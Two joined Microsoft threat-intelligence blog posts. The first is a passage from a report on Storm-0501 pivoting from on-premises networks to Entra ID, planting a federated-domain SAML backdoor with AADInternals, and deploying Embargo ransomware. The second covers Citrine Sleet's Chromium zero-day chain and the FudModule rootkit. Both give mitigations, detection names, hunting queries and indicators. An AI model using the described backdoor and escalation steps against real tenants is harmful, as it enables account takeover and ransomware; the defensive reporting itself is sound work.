If a compromised on-premises user account is not assigned with an administrative role in Microsoft Entra ID and is synced to the cloud and no security boundaries such as MFA or Conditional Access are set, then the threat actor could escalate to the cloud through the following:

1. If the password is known, then logging in to Microsoft Entra is possible from any device.
2. If the password is unknown, the threat actor can reset the on-premises user password, and after a few minutes the new password will be synced to the cloud.
3. If they hold credentials of a compromised Microsoft Entra Directory Synchronization Account, they can set the cloud password using AADInternals’ Set-AADIntUserPassword cmdlet.

If MFA for that user account is enabled, then authentication with the user will require the threat actor to tamper with the MFA or gain control of a device owned by the user and subsequently hijack its cloud session or extract its Microsoft Entra access tokens along with their MFA claims.

MFA is a security practice that requires users to provide two or more verification factors to gain access to a resource and is a recommended security practice for all users, especially for privileged administrators. A lack of MFA or Conditional Access policies limiting the sign-in options opens a wide door of possibilities for the attacker to pivot to the cloud environment, especially if the user has administrative privileges. To increase the security of admin accounts, Microsoft is rolling out additional tenant-level security measures to require MFA for all Azure users.

Impact

Cloud compromise leading to backdoor

Following a successful pivot from the on-premises environment to the cloud through the compromised Microsoft Entra Connect Sync user account or the cloud admin account compromised through cloud session hijacking, the threat actor was able to connect to Microsoft Entra (portal/MS Graph) from any device, using a privileged Microsoft Entra ID account, such as a Global Administrator, and was no longer limited to the compromised devices.

Once Global Administrator access is available for Storm-0501, we observed them creating a persistent backdoor access for later use by creating a new federated domain in the tenant. This backdoor enables an attacker to sign in as any user of the Microsoft Entra ID tenant in hand if the Microsoft Entra ID user property ImmutableId is known or set by the attackers. For users that are configured to be synced by the Microsoft Entra Connect service, the ImmutableId property is automatically populated, while for users that are not synced the default value is null. However, users with administrative privileges can add an ImmutableId value, regardless.

The threat actor used the open-source tool AADInternals, and its Microsoft Entra ID capabilities to create the backdoor. AADInternals is a PowerShell module designed for security researchers and penetration testers that provides various methods for interacting and testing Microsoft Entra ID and is commonly used by Storm-0501. To create the backdoor, the threat actor first needed to have a domain of their own that is registered to Microsoft Entra ID. The attacker’s next step is to determine whether the target domain is managed or federated. A federated domain in Microsoft Entra ID is a domain that is configured to use federation technologies, such as Active Directory Federation Services (AD FS), to authenticate users. If the target domain is managed, then the attackers need to convert it to a federated one and provide a root certificate to sign future tokens upon user authentication and authorization processes. If the target domain is already federated, then the attackers need to add the root certificate as “NextSigningCertificate”.

Once a backdoor domain is available for use, the threat actor creates a federation trust between the compromised tenant, and their own tenant. The threat actor uses the AADInternals commands that enable the creation of Security Assertion Markup Language (SAML or SAML2) tokens, which can be used to impersonate any user in the organization and bypass MFA to sign in to any application. Microsoft observed the actor using the SAML token sign in to Office 365.

On-premises compromise leading to ransomware

Once the threat actor achieved sufficient control over the network, successfully extracted sensitive files, and managed to move laterally to the cloud environment, the threat actor then deployed the Embargo ransomware across the organization. We observed that the threat actor did not always resort to ransomware distribution, and in some cases only maintained backdoor access to the network.

Embargo ransomware is a new strain developed in Rust, known to use advanced encryption methods. Operating under the RaaS model, the ransomware group behind Embargo allows affiliates like Storm-0501 to use its platform to launch attacks in exchange for a share of the ransom. Embargo affiliates employ double extortion tactics, where they first encrypt a victim’s files and threaten to leak stolen sensitive data unless a ransom is paid.

In the cases observed by Microsoft, the threat actor leveraged compromised Domain Admin accounts to distribute the Embargo ransomware via a scheduled task named “SysUpdate” that was registered via GPO on the devices in the network. The ransomware binaries names that were used were PostalScanImporter.exe and win.exe. Once the files on the target devices were encrypted, the encrypted files extension changed to .partial, .564ba1, and .embargo.

Mitigation and protection guidance

Microsoft recently implemented a change in Microsoft Entra ID that restricts permissions on the Directory Synchronization Accounts (DSA) role in Microsoft Entra Connect Sync and Microsoft Entra Cloud Sync as part of ongoing security hardening. This change helps prevent threat actors from abusing Directory Synchronization Accounts in attacks.

Customers may also refer to Microsoft’s human-operated ransomware overview for general hardening recommendations against ransomware attacks.

The other techniques used by threat actors and described in this blog can be mitigated by adopting the following security measures:

• Secure accounts with credential hygiene: practice the principle of least privilege and audit privileged account activity in your Microsoft Entra ID environments to slow and stop attackers.
• Enable Conditional Access policies – Conditional Access policies are evaluated and enforced every time the user attempts to sign in. Organizations can protect themselves from attacks that leverage stolen credentials by enabling policies such as device compliance or trusted IP address requirements.
  • Set a Conditional Access policy to limit the access of Microsoft Entra ID sync accounts from untrusted IP addresses to all cloud apps. The Microsoft Entra ID sync account is identified by having the role ‘Directory Synchronization Accounts’. Please refer to the Advanced Hunting section and check the relevant query to get those IP addresses.
• Implement Conditional Access authentication strength to require phishing-resistant authentication for employees and external users for critical apps.
• Follow Microsoft’s best practices for securing Active Directory Federation Services.  
• Refer to Azure Identity Management and access control security best practices for further steps and recommendations to manage, design, and secure your Azure AD environment can be found by referring.
• Ensure Microsoft Defender for Cloud Apps connectors are turned on for your organization to receive alerts on the Microsoft Entra ID sync account and all other users.
• Enable protection to prevent by-passing of cloud Microsoft Entra MFA when federated with Microsoft Entra ID.
• Set the validatingDomains property of federatedTokenValidationPolicy to “all” to block attempts to sign-in to any non-federated domain (like .onmicrosoft.com) with SAML tokens.
• Turn on Microsoft Entra ID protection to monitor identity-based risks and create risk-based conditional access policies to remediate risky sign-ins.
• Turn on tamper protection features to prevent attackers from stopping security services such as Microsoft Defender for Endpoint, which can help prevent hybrid cloud environment attacks such as Microsoft Entra Connect abuse.
• Refer to the recommendations in our attacker technique profile, including use of Windows Defender Application Control or AppLocker to create policies to block unapproved information technology (IT) management tools to protect against the abuse of legitimate remote management tools like AnyDesk or Level.io.
• Run endpoint detection and response (EDR) in block mode so that Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts detected post-breach.
• Turn on investigation and remediation in full automated mode to allow Defender for Endpoint to take immediate action on alerts to help remediate alerts, significantly reducing alert volume.

Detection details

Alerts with the following names can be in use when investigating the current campaign of Storm-0501.

Microsoft Defender XDR detections

Microsoft Defender Antivirus 

Microsoft Defender Antivirus detects the Cobalt Strike Beacon as the following:

• Behavior:Win32/CobaltStrike
• Backdoor:Win64/CobaltStrike
• HackTool:Win64/CobaltStrike

Additional Cobalt Strike components are detected as the following:

• TrojanDropper:PowerShell/Cobacis
• Trojan:Win64/TurtleLoader.CS
• Exploit:Win32/ShellCode.BN

Microsoft Defender Antivirus detects tools that enable Microsoft Entra ID enumeration as the following malware: 

• Backdoor:Win32/SuspAadInternalsUsage

Embargo Ransomware threat components are detected as the following:

• Ransom:Win32/Embargo

Microsoft Defender for Endpoint 

Alerts with the following titles in the security center can indicate threat activity related to Storm-0501 on your network:

• Ransomware-linked Storm-0501 threat actor detected

The following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report. 

• Possible Adobe ColdFusion vulnerability exploitation
• Compromised account conducting hands-on-keyboard attack
• Ongoing hands-on-keyboard attacker activity detected (Cobalt Strike)
• Ongoing hands-on-keyboard attack via Impacket toolkit
• Suspicious Microsoft Defender Antivirus exclusion
• Attempt to turn off Microsoft Defender Antivirus protection
• Renaming of legitimate tools for possible data exfiltration
• BlackCat ransomware
• ‘Embargo’ ransomware was detected and was active
• Suspicious Group Policy action detected
• An active ‘Embargo’ ransomware was detected

The following alerts might indicate on-premises to cloud pivot through Microsoft Entra Connect:

• Entra Connect Sync credentials extraction attempt
• Suspicious cmdlets launch using AADInternals
• Potential Entra Connect Tampering
• Indication of local security authority secrets theft

Microsoft Defender for Identity

The following Microsoft Defender for Identity alerts can indicate activity related to this threat:

• Data exfiltration over SMB
• Suspected DCSync attack

Microsoft Defender for Cloud Apps

Microsoft Defender for Cloud Apps can detect abuse of permissions in Microsoft Entra ID and other cloud apps. Activities related to the Storm-0501 campaign described in this blog are detected as the following:

• Backdoor creation using AADInternals tool
• Compromised Microsoft Entra ID Cloud Sync account
• Suspicious sign-in to Microsoft Entra Connect Sync account
• Entra Connect Sync account suspicious activity following a suspicious login
• AADInternals tool used by a Microsoft Entra Sync account
• Suspicious login from AADInternals tool

Microsoft Defender Vulnerability Management

Microsoft Defender Vulnerability Management surfaces devices that may be affected by the following vulnerabilities used in this threat:

• CVE-2022-47966

Threat intelligence reports 

Microsoft customers can use the following reports in Microsoft Defender Threat Intelligence to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments: 

• Storm-0501

Advanced hunting 

Microsoft Defender XDR

Microsoft Defender XDR customers can run the following query to find related activity in their networks:

Microsoft Entra Connect Sync account exploration

Explore sign-in activity from IdentityLogonEvents, look for uncommon behavior, such as sign-ins from newly seen IP addresses or sign-ins to new applications that are non-sync related.

IdentityLogonEvents
| where Timestamp > ago(30d)
| where AccountDisplayName contains "On-Premises Directory Synchronization Service Account"
| extend ApplicationName = tostring(RawEventData.ApplicationName)
| project-reorder Timestamp, AccountDisplayName, AccountObjectId, IPAddress, ActionType, ApplicationName, OSPlatform, DeviceType

Usually, the activity of the sync account is repetitive, coming from the same IP address to the same application, any deviation from the natural flow is worth investigating. Cloud applications that normally accessed by the Microsoft Entra ID sync account are “Microsoft Azure Active Directory Connect”, “Windows Azure Active Directory”, “Microsoft Online Syndication Partner Portal”

Explore the cloud activity (a.k.a ActionType) of the sync account, same as above, this account by nature performs a certain set of actions including ‘update User.’, ‘update Device.’ and so on. New and uncommon activity from this user might indicate an interactive use of the account, even though it could have been from someone inside the organization it could also be the threat actor.

CloudAppEvents
| where Timestamp > ago(30d)
| where AccountDisplayName has "On-Premises Directory Synchronization Service Account"
| extend Workload = RawEventData.Workload
| project-reorder Timestamp, IPAddress, AccountObjectId, ActionType, Application, Workload, DeviceType, OSPlatform, UserAgent, ISP

Pay close attention to action from different DeviceTypes or OSPlatforms, this account automated service is performed from one specific machine, so there shouldn’t be any variety in these fields.

Check which IP addresses Microsoft Entra Connect Sync account uses

This query reveals all IP addresses that the default Microsoft Entra Connect Sync account uses so those could be added as trusted IP addresses for the Entra ID sync account (make sure the account is not compromised before relying on this list)

IdentityLogonEvents
| where AccountDisplayName has "On-Premises Directory Synchronization Service Account"
| where ActionType == "LogonSuccess"
| distinct IPAddress
| union (CloudAppEvents
| where AccountDisplayName has "On-Premises Directory Synchronization Service Account"
| distinct IPAddress)
| distinct IPAddress

Federation and authentication domain changes

Explore the addition of a new authentication or federation domain, validate that the new domain is valid one and was purposefully added

CloudAppEvents
| where Timestamp > ago(30d)
| where ActionType in ("Set domain authentication.", "Set federation settings on domain.")

Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.

Assess your environment for Manage Engine, Netscaler, and ColdFusion vulnerabilities.

DeviceTvmSoftwareVulnerabilities  
| where CveId in ("CVE-2022-47966","CVE-2023-4966","CVE-2023-29300","CVE-2023-38203")   
| project DeviceId,DeviceName,OSPlatform,OSVersion,SoftwareVendor,SoftwareName,SoftwareVersion,  
CveId,VulnerabilitySeverityLevel  
| join kind=inner ( DeviceTvmSoftwareVulnerabilitiesKB | project CveId, CvssScore,IsExploitAvailable,VulnerabilitySeverityLevel,PublishedDate,VulnerabilityDescription,AffectedSoftware ) on CveId  
| project DeviceId,DeviceName,OSPlatform,OSVersion,SoftwareVendor,SoftwareName,SoftwareVersion,  
CveId,VulnerabilitySeverityLevel,CvssScore,IsExploitAvailable,PublishedDate,VulnerabilityDescription,AffectedSoftware

Search for file IOC

let selectedTimestamp = datetime(2024-09-17T00:00:00.0000000Z);
let fileName = dynamic(["PostalScanImporter.exe","win.exe","name.dll","248.dll","cs240.dll","fel.ocx","theme.ocx","hana.ocx","obfs.ps1","recon.ps1"]); 
let FileSHA256 = dynamic(["efb2f6452d7b0a63f6f2f4d8db49433259249df598391dd79f64df1ee3880a8d","a9aeb861817f3e4e74134622cbe298909e28d0fcc1e72f179a32adc637293a40","caa21a8f13a0b77ff5808ad7725ff3af9b74ce5b67426c84538b8fa43820a031","53e2dec3e16a0ff000a8c8c279eeeca8b4437edb8ec8462bfbd9f64ded8072d9","827f7178802b2e92988d7cff349648f334bc86317b0b628f4bb9264285fccf5f","ee80f3e3ad43a283cbc83992e235e4c1b03ff3437c880be02ab1d15d92a8348a","de09ec092b11a1396613846f6b082e1e1ee16ea270c895ec6e4f553a13716304","d065623a7d943c6e5a20ca9667aa3c41e639e153600e26ca0af5d7c643384670","c08dd490860b54ae20fa9090274da9ffa1ba163f00d1e462e913cf8c68c11ac1"]); 
search in (AlertEvidence,BehaviorEntities,CommonSecurityLog,DeviceBaselineComplianceProfiles,DeviceEvents,DeviceFileEvents,DeviceImageLoadEvents, DeviceLogonEvents,DeviceNetworkEvents,DeviceProcessEvents,DeviceRegistryEvents,DeviceFileCertificateInfo,DynamicEventCollection,EmailAttachmentInfo,OfficeActivity,SecurityEvent,ThreatIntelligenceIndicator) TimeGenerated between ((selectedTimestamp - 1m) .. (selectedTimestamp + 90d)) // from September 17th runs the search for 90 days, change the selectedTimestamp accordingly. and  (FileName in (fileName) or OldFileName in (fileName)  or ProfileName in (fileName)  or InitiatingProcessFileName in (fileName)  or InitiatingProcessParentFileName in (fileName)  or InitiatingProcessVersionInfoInternalFileName in (fileName)  or InitiatingProcessVersionInfoOriginalFileName in (fileName)  or PreviousFileName in (fileName)  or ProcessVersionInfoInternalFileName in (fileName) or ProcessVersionInfoOriginalFileName in (fileName) or DestinationFileName in (fileName) or SourceFileName in (fileName)or ServiceFileName in (fileName) or SHA256 in (FileSHA256)  or InitiatingProcessSHA256 in (FileSHA256))

Microsoft Sentinel also has a range of detection and threat hunting content that customers can use to detect the post exploitation activity detailed in this blog, in addition to Microsoft Defender XDR detections list above.

• Remote Management Monitoring Network Connections
• Level.io RMM File Signature
• AnyDesk RMM File Signature
• NinjaOne RMM File Signature
• Potential Impacket Execution
• Potential ransomware activity related to Cobalt Strike
• Cobalt DNS Beacon
• C2-NamedPipe
• Renamed Rclone Exfiltration
• Disable Or Modify Windows Defender
• Clearing of forensic evidence from event logs using wevtutil
• Suspicious Signin By AAD Connect Account

Indicators of compromise (IOCs)

The following list provides indicators of compromise (IOCs) observed during our investigation. We encourage our customers to investigate these indicators within their environments and implement detections and protections to identify any past related activity and prevent future attacks against their systems.

References

• The Rust Revolution: New Embargo Ransomware Steps In – Cyble
• Embargo Ransomware Group: The Interview (suspectfile.com)
• https://aadinternals.com/post/aadbackdoor/
• https://aadinternals.com/post/aad-deepdive/

Omri Refaeli, Tafat Gaspar, Vaibhav Deshmukh, Naya Hashem, Charles-Edouard Bettan

Microsoft Threat Intelligence Community

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://twitter.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post Storm-0501: Ransomware attacks expanding to hybrid cloud environments appeared first on Microsoft Security Blog.

CVE-2024-7971 is a type confusion vulnerability in the V8 JavaScript and WebAssembly engine, impacting versions of Chromium prior to 128.0.6613.84. Exploiting the vulnerability could allow threat actors to gain RCE in the sandboxed Chromium renderer process. Google released a fix for the vulnerability on August 21, 2024, and users should ensure they are using the latest version of Chromium. We would like to thank the Chromium team for their collaboration in addressing this issue. CVE-2024-7971 is the third exploited V8 type confusion vulnerability that has been patched in V8 this year, after CVE-2024-4947 and CVE-2024-5274. As with any observed nation-state actor activity, Microsoft has directly notified targeted or compromised customers, providing them with important information to help secure their environments.

In this blog, we share details on the North Korean threat actor Citrine Sleet and the observed tactics, techniques, and procedures (TTPs) used to exploit CVE-2024-7971, deploy the FudModule rootkit, and compromise systems. We further provide recommended mitigations, detection details, hunting guidance, and indicators of compromise (IOCs) to help defenders identify, respond to, and improve defenses against these attacks.

Who is Citrine Sleet?

The threat actor that Microsoft tracks as Citrine Sleet is based in North Korea and primarily targets financial institutions, particularly organizations and individuals managing cryptocurrency, for financial gain. As part of its social engineering tactics, Citrine Sleet has conducted extensive reconnaissance of the cryptocurrency industry and individuals associated with it. The threat actor creates fake websites masquerading as legitimate cryptocurrency trading platforms and uses them to distribute fake job applications or lure targets into downloading a weaponized cryptocurrency wallet or trading application based on legitimate applications. Citrine Sleet most commonly infects targets with the unique trojan malware it developed, AppleJeus, which collects information necessary to seize control of the targets’ cryptocurrency assets. The FudModule rootkit described in this blog has now been tied to Citrine Sleet as shared tooling with Diamond Sleet.

The United States government has assessed that North Korean actors, like Citrine Sleet, will likely continue targeting vulnerabilities of cryptocurrency technology firms, gaming companies, and exchanges to generate and launder funds to support the North Korean regime. One of the organizations targeted by the CVE-2024-7971 exploitation was also previously targeted by Sapphire Sleet.

Citrine Sleet is tracked by other security companies as AppleJeus, Labyrinth Chollima, UNC4736, and Hidden Cobra, and has been attributed to Bureau 121 of North Korea’s Reconnaissance General Bureau.

Exploiting CVE-2024-7971

The observed zero-day exploit attack by Citrine Sleet used the typical stages seen in browser exploit chains. First, the targets were directed to the Citrine Sleet-controlled exploit domain voyagorclub[.]space. While we cannot confirm at this time how the targets were directed, social engineering is a common tactic used by Citrine Sleet. Once a target connected to the domain, the zero-day RCE exploit for CVE-2024-7971 was served.

After the RCE exploit achieved code execution in the sandboxed Chromium renderer process, shellcode containing a Windows sandbox escape exploit and the FudModule rootkit was downloaded, and then loaded into memory. The sandbox escape exploited CVE-2024-38106, a vulnerability in the Windows kernel that Microsoft fixed on August 13, 2024, before Microsoft discovered this North Korean threat actor activity. CVE-2024-38106 was reported to Microsoft Security Response Center (MSRC) as being exploited; however, our investigations so far have not suggested any link between the reported CVE-2024-38106 exploit activity and this Citrine Sleet exploit activity, beyond exploiting the same vulnerability. This may suggest a “bug collision,” where the same vulnerability is independently discovered by separate threat actors, or knowledge of the vulnerability was shared by one vulnerability researcher to multiple actors.

Once the sandbox escape exploit was successful, the main FudModule rootkit ran in memory. This rootkit employs direct kernel object manipulation (DKOM) techniques to disrupt kernel security mechanisms, executes exclusively from user mode, and performs kernel tampering through a kernel read/write primitive. We did not observe any additional malware activity on the target devices.

FudModule rootkit

FudModule is a sophisticated rootkit malware that specifically targets kernel access while evading detection. Threat actors have been observed using the FudModule data-only rootkit to establish admin-to-kernel access to Windows-based systems to allow read/write primitive functions and perform DKOM.

Diamond Sleet has been observed using FudModule since October 2021. The earliest variant of FudModule was reported publicly in September 2022 by ESET and AhnLAB researchers, when threat actors exploited known vulnerable drivers to establish admin-to-kernel access in the technique known as bring your own vulnerable driver (BYOVD). In February 2024, Avast researchers published analysis on an updated FudModule variant that is significantly more advanced and difficult to detect, since it exploits a zero-day vulnerability in appid.sys, an AppLocker driver that is installed by default into Windows (CVE-2024-21338).

Further research by Avast uncovered a full attack chain deploying the updated variant of FudModule known as “FudModule 2.0,” which includes malicious loaders and a late-stage remote access trojan (RAT). This attack chain revealed the previously unknown malware Kaolin RAT was responsible for loading the FudModule rootkit to targeted devices. Kaolin RAT established a secure, AES-encrypted connection with the command and control (C2) server and had capabilities to execute a robust list of commands, such as downloading and uploading files to the C2 server and creating or updating processes. The updated variant of FudModule exhibited an attack chain similar to that seen in Citrine Sleet’s zero-day exploit of CVE-2024-7971.

On August 13, Microsoft released a security update to address a zero-day vulnerability in the AFD.sys driver in Windows (CVE-2024-38193) identified by Gen Threat Labs. In early June, Gen Threat Labs identified Diamond Sleet exploiting this vulnerability in an attack employing the FudModule rootkit, which establishes full standard user-to-kernel access, advancing from the previously seen admin-to-kernel access. Gen Threat Labs released this information publicly on August 16.

Recommendations

The CVE-2024-7971 exploit chain relies on multiple components to compromise a target, and this attack chain fails if any of these components are blocked, including CVE-2024-38106. Microsoft released a security update on August 13, 2024, for the CVE-2024-38106 vulnerability exploited by Diamond Sleet, thus also blocking attempts to exploit the CVE-2024-7971 exploit chain on updated systems. Customers who have not implemented these fixes yet are urged to do so as soon as possible for their organization’s security.

Zero-day exploits necessitate not only keeping systems up to date, but also security solutions that provide unified visibility across the cyberattack chain to detect and block post-compromise attacker tools and malicious activity following exploitation. Microsoft recommends the following mitigations to reduce the impact of this threat.

Strengthen operating environment configuration

• Keep operating systems and applications up to date. Apply security patches as soon as possible. Ensure that Google Chrome web browser is updated at version 128.0.6613.84 or later, and Microsoft Edge web browser is updated at version 128.0.2739.42 or later to address the CVE-2024-7971 vulnerability.
• Encourage users to use Microsoft Edge and other web browsers that support Microsoft Defender SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.

Strengthen Microsoft Defender for Endpoint configuration

• Ensure that tamper protection is turned on in Microsoft Dender for Endpoint.
• Enable network protection in Microsoft Defender for Endpoint.
• Run endpoint detection and response (EDR) in block mode so that Microsoft Defender for Endpoint can help block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to help remediate malicious artifacts that are detected post-breach.
• Configure investigation and remediation in full automated mode to let Microsoft Defender for Endpoint take immediate action on alerts to help resolve breaches, significantly reducing alert volume.

Strengthen Microsoft Defender Antivirus configuration

• Turn on cloud-delivered protection in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to help cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block majority of new and unknown variants.
• Turn on Microsoft Defender Antivirus scanning of downloaded files and attachments.
• Turn on real-time protection in Microsoft Defender Antivirus.

Detection details

Microsoft Defender for Endpoint

The following Microsoft Defender for Endpoint alert might also indicate threat activity related to this threat. Note, however, that this alert can also be triggered by unrelated threat activity.

• Emerging threat activity group Citrine Sleet detected

Microsoft Defender Vulnerability Management

Microsoft Defender Vulnerability Management surfaces devices that may be affected by the following vulnerabilities used in this threat:

• CVE-2024-7971
• CVE-2024-38106

Threat intelligence reports

Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide intelligence and protection information, and recommend actions to help prevent, mitigate, or respond to associated threats found in customer environments.

Microsoft Defender Threat Intelligence

• Actor profile: Citrine Sleet
• Actor profile: Diamond Sleet
• Tool profile: AppleJeus

Hunting queries

Microsoft Defender XDR

Microsoft Defender XDR customers can run the following query to find related activity in their networks:

Citrine Sleet domain activity

Microsoft Defender XDR customers may query for devices that may have interacted with Citrine Sleet domains related to this activity. Note that Microsoft Defender for Endpoint customers may surface related events with the alert title “Emerging threat activity group Citrine Sleet detected”.

let domainList = dynamic(["weinsteinfrog.com", "voyagorclub.space"]);
union
(
    DnsEvents
    | where QueryType has_any(domainList) or Name has_any(domainList)
    | project TimeGenerated, Domain = QueryType, SourceTable = "DnsEvents"
),
(
    IdentityQueryEvents
    | where QueryTarget has_any(domainList)
    | project Timestamp, Domain = QueryTarget, SourceTable = "IdentityQueryEvents"
),
(
    DeviceNetworkEvents
    | where RemoteUrl has_any(domainList)
    | project Timestamp, Domain = RemoteUrl, SourceTable = "DeviceNetworkEvents"
),
(
    DeviceNetworkInfo
    | extend DnsAddresses = parse_json(DnsAddresses), ConnectedNetworks = parse_json(ConnectedNetworks)
    | mv-expand DnsAddresses, ConnectedNetworks
    | where DnsAddresses has_any(domainList) or ConnectedNetworks.Name has_any(domainList)
    | project Timestamp, Domain = coalesce(DnsAddresses, ConnectedNetworks.Name), SourceTable = "DeviceNetworkInfo"
),
(
    VMConnection
    | extend RemoteDnsQuestions = parse_json(RemoteDnsQuestions), RemoteDnsCanonicalNames = parse_json(RemoteDnsCanonicalNames)
    | mv-expand RemoteDnsQuestions, RemoteDnsCanonicalNames
    | where RemoteDnsQuestions has_any(domainList) or RemoteDnsCanonicalNames has_any(domainList)
    | project TimeGenerated, Domain = coalesce(RemoteDnsQuestions, RemoteDnsCanonicalNames), SourceTable = "VMConnection"
),
(
    W3CIISLog
    | where csHost has_any(domainList) or csReferer has_any(domainList)
    | project TimeGenerated, Domain = coalesce(csHost, csReferer), SourceTable = "W3CIISLog"
),
(
    EmailUrlInfo
    | where UrlDomain has_any(domainList)
    | project Timestamp, Domain = UrlDomain, SourceTable = "EmailUrlInfo"
),
(
    UrlClickEvents
    | where Url has_any(domainList)
    | project Timestamp, Domain = Url, SourceTable = "UrlClickEvents"
)
| order by TimeGenerated desc

Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.

Search for domain IOCs

let domainList = dynamic(["weinsteinfrog.com", "voyagorclub.space"]); 
union 
( 
DnsEvents 
| where QueryType has_any(domainList) or Name has_any(domainList) 
| project TimeGenerated, Domain = QueryType, SourceTable = "DnsEvents" 
), 
( 
IdentityQueryEvents 
| where QueryTarget has_any(domainList) 
| project TimeGenerated, Domain = QueryTarget, SourceTable = "IdentityQueryEvents" 
), 
( 
DeviceNetworkEvents 
| where RemoteUrl has_any(domainList) 
| project TimeGenerated, Domain = RemoteUrl, SourceTable = "DeviceNetworkEvents" 
), 
( 
DeviceNetworkInfo 
| extend DnsAddresses = parse_json(DnsAddresses), ConnectedNetworks = parse_json(ConnectedNetworks) 
| mv-expand DnsAddresses, ConnectedNetworks 
| where DnsAddresses has_any(domainList) or ConnectedNetworks.Name has_any(domainList) 
| project TimeGenerated, Domain = coalesce(DnsAddresses, ConnectedNetworks.Name), SourceTable = "DeviceNetworkInfo" 
), 
( 
VMConnection 
| extend RemoteDnsQuestions = parse_json(RemoteDnsQuestions), RemoteDnsCanonicalNames = parse_json(RemoteDnsCanonicalNames) 
| mv-expand RemoteDnsQuestions, RemoteDnsCanonicalNames 
| where RemoteDnsQuestions has_any(domainList) or RemoteDnsCanonicalNames has_any(domainList) 
| project TimeGenerated, Domain = coalesce(RemoteDnsQuestions, RemoteDnsCanonicalNames), SourceTable = "VMConnection" 
), 
( 
W3CIISLog 
| where csHost has_any(domainList) or csReferer has_any(domainList) 
| project TimeGenerated, Domain = coalesce(csHost, csReferer), SourceTable = "W3CIISLog" 
), 
( 
EmailUrlInfo 
| where UrlDomain has_any(domainList) 
| project TimeGenerated, Domain = UrlDomain, SourceTable = "EmailUrlInfo" 
), 
( 
UrlClickEvents 
| where Url has_any(domainList) 
| project TimeGenerated, Domain = Url, SourceTable = "UrlClickEvents" 
),
(
CommonSecurityLog
| where DestinationDnsDomain has_any(domainList)
| project TimeGenerated, Domain = DestinationDnsDomain, SourceTable = "CommonSecurityLog" 
),
(
EmailEvents
| where SenderFromDomain has_any (domainList) or SenderMailFromDomain has_any (domainList)
| project TimeGenerated, SenderfromDomain = SenderFromDomain,SenderMailfromDomain = SenderMailFromDomain, SourceTable = "EmailEvents"
)
| order by TimeGenerated desc

Assess presence of vulnerabilities used by Citrine Sleet

DeviceTvmSoftwareVulnerabilities  
| where CveId has_any ("CVE-2024-7971","CVE-2024-38106","CVE-2024-38193","CVE-2024-21338")
| project DeviceId,DeviceName,OSPlatform,OSVersion,SoftwareVendor,SoftwareName,SoftwareVersion,  
CveId,VulnerabilitySeverityLevel  
| join kind=inner ( DeviceTvmSoftwareVulnerabilitiesKB | project CveId, CvssScore,IsExploitAvailable,VulnerabilitySeverityLevel,PublishedDate,VulnerabilityDescription,AffectedSoftware ) on CveId  
| project DeviceId,DeviceName,OSPlatform,OSVersion,SoftwareVendor,SoftwareName,SoftwareVersion,  
CveId,VulnerabilitySeverityLevel,CvssScore,IsExploitAvailable,PublishedDate,VulnerabilityDescription,AffectedSoftware

Indicators of compromise

During the attacks, Microsoft observed the following IOCs:

• voyagorclub[.]space
• weinsteinfrog[.]com

References

• https://nvd.nist.gov/vuln/detail/CVE-2024-7971
• https://chromereleases.googleblog.com/2024/08/stable-channel-update-for-desktop_21.html
• https://nvd.nist.gov/vuln/detail/CVE-2024-4947
• https://nvd.nist.gov/vuln/detail/CVE-2024-5274
• https://decoded.avast.io/janvojtesek/lazarus-and-the-fudmodule-rootkit-beyond-byovd-with-an-admin-to-kernel-zero-day/
• https://www.virusbulletin.com/uploads/pdf/conference/vb2022/papers/VB2022-Lazarus-and-BYOVD-evil-to-the-Windows-core.pdf
• https://asec.ahnlab.com/wp-content/uploads/2022/09/Analysis-Report-on-Lazarus-Groups-Rootkit-Attack-Using-BYOVD_Sep-22-2022.pdf
• https://decoded.avast.io/luiginocamastra/from-byovd-to-a-0-day-unveiling-advanced-exploits-in-cyber-recruiting-scams/
• https://www.gendigital.com/blog/news/innovation/protecting-windows-users
• https://www.google.com/chrome/update/
• https://chromereleases.googleblog.com/2024/08/stable-channel-update-for-desktop_21.html

Learn more

Read our blogs on threat actors, including Sleet actors. For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://twitter.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post North Korean threat actor Citrine Sleet exploiting Chromium zero-day appeared first on Microsoft Security Blog.

